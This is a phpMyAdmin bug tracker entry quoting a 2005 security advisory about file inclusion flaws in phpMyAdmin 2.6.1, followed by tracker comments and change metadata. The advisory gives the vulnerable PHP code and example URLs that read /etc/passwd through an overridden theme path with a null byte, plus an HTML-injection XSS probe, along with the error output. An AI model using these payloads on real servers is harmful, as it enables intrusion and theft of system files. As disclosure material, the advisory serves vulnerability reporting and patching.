Tracker: Bugs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4]
Author: cXIb8O3
Date: 21.2.2005
- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
- --- 1. Remote file inclusion ---
1.0
This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in
Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------
And now you can get files.
For exemple:
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&the
me=passwd%00
1.1
Or next include is in libraries/database_interface.lib.php
Code:
- ---
18# require_once('./libraries/dbi/' .
$cfg['Server']['extension'] . '.dbi.lib.php');
- ---
For exemple:
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extens
ion]=cXIb8O3
Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------
Or if you want and if you see php error, can you make
xss with php buq. For Exemple:
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extens
ion]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E
- --- 2. How to fix ---
Download the new version of the script or update.
- --- 3. Greets ---
sp3x.
i need help.. :(
- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)
iD8DBQFCG5WfznmvyJCR4zQRAjwxAJ9iJkCGyD5HPMCbOjYb1WdR9HEcdwCgkHLO
2FuB5Nqz2rMTa1b26PMgzrk=
=oyWn
-----END PGP SIGNATURE-----
Alexander M. Turek
None
2.6.1
Public
Comments ( 12 )
|
Date: 2005-02-23 18:00 Logged In: YES |
|
Date: 2005-02-23 17:30 Logged In: YES |
|
Date: 2005-02-23 14:57 Logged In: YES |
|
Date: 2005-02-23 14:30 Logged In: YES |
|
Date: 2005-02-23 13:57 Logged In: YES |
|
Date: 2005-02-23 13:37 Logged In: YES |
|
Date: 2005-02-23 13:02 Logged In: YES |
|
Date: 2005-02-23 11:39 Logged In: YES |
|
Date: 2005-02-23 08:15 Logged In: YES |
|
Date: 2005-02-23 08:13 Logged In: YES |
|
Date: 2005-02-23 00:27 Logged In: YES |
|
Date: 2005-02-22 21:41 Logged In: YES |
Attached File ( 1 )
| Filename | Description | Download |
|---|---|---|
| grab_globals.lib.php | Download |
Changes ( 15 )
| Field | Old Value | Date | By |
|---|---|---|---|
| close_date | - | 2005-02-27 11:25 | rabus |
| status_id | Open | 2005-02-27 11:25 | rabus |
| summary | (in 2.6.2) Remote file inclusion | 2005-02-23 18:31 | rabus |
| category_id | Security / Restrictions | 2005-02-23 14:57 | lem9 |
| category_id | None | 2005-02-23 14:52 | rabus |
| resolution_id | None | 2005-02-23 13:37 | rabus |
| priority | 5 | 2005-02-23 13:37 | rabus |
| summary | (2.6.1) Remote file inclusion | 2005-02-23 13:37 | rabus |
| File Added | 122735: grab_globals.lib.php | 2005-02-23 11:39 | rabus |
| File Deleted | 122664: | 2005-02-23 11:39 | rabus |
| File Added | 122664: grab_globals.lib.php | 2005-02-23 00:27 | rabus |
| assigned_to | nobody | 2005-02-23 00:27 | rabus |
| summary | [phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4] | 2005-02-22 21:41 | rabus |
| priority | 7 | 2005-02-22 21:36 | rabus |
| priority | 5 | 2005-02-22 21:09 | cxib8o3 |
